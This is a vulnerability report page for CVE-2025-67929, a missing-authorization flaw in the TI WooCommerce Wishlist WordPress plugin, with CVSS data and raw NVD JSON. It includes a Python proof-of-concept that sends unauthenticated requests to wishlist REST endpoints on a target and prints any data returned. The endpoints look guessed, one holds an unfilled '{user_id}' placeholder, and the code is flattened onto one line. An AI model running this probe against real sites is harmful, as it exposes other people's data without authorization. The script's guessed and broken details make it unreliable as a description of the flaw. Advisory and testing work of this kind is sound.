Security Vulnerability Report
中文
CVE-2025-67929 CVSS 5.3 MEDIUM

CVE-2025-67929

Published: 2025-12-16 09:15:59
Last Modified: 2026-04-27 18:16:50

Description

Missing Authorization vulnerability in templateinvaders TI WooCommerce Wishlist ti-woocommerce-wishlist allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects TI WooCommerce Wishlist: from n/a through <= 2.10.0.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

TI WooCommerce Wishlist (ti-woocommerce-wishlist) <= 2.10.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-67929 PoC - TI WooCommerce Wishlist Unauthorized Access # Target: WordPress site with TI WooCommerce Wishlist plugin <= 2.10.0 def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-67929 Missing Authorization in TI WooCommerce Wishlist plugin """ # Common REST API endpoints for TI WooCommerce Wishlist endpoints = [ '/wp-json/ti-wishlist/v1/wishlists/1', '/wp-json/ti-wishlist/v1/wishlist-items?user_id=1', '/wp-json/ti-wishlist/v1/wishlist/{user_id}', '/?rest_route=/ti-wishlist/v1/wishlists/1' ] print(f"[*] Testing target: {target_url}") print(f"[*] Vulnerability: CVE-2025-67929 - Missing Authorization") print("-" * 60) for endpoint in endpoints: url = target_url.rstrip('/') + endpoint print(f"\n[+] Testing endpoint: {endpoint}") try: # Send request without authentication response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: data = response.json() print(f"[!] VULNERABLE: Received 200 OK response") print(f"[+] Response data preview: {str(data)[:200]}...") return True elif response.status_code == 401: print(f"[-] Not vulnerable: Endpoint requires authentication") else: print(f"[-] Status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") print("\n[-] Target may not be vulnerable or endpoint not found") return False def main(): if len(sys.argv) < 2: print("Usage: python cve-2025-67929.py <target_url>") print("Example: python cve-2025-67929.py http://example.com") sys.exit(1) target_url = sys.argv[1] vulnerable = check_vulnerability(target_url) if vulnerable: print("\n[!] Target is VULNERABLE to CVE-2025-67929") print("[!] Recommendation: Update TI WooCommerce Wishlist to latest version") else: print("\n[-] Target appears NOT vulnerable") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67929", "sourceIdentifier": "[email protected]", "published": "2025-12-16T09:15:59.320", "lastModified": "2026-04-27T18:16:50.113", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in templateinvaders TI WooCommerce Wishlist ti-woocommerce-wishlist allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects TI WooCommerce Wishlist: from n/a through <= 2.10.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/ti-woocommerce-wishlist/vulnerability/wordpress-ti-woocommerce-wishlist-plugin-2-10-0-broken-access-control-vulnerability-2?_s_id=cve", "source": "[email protected]"}]}}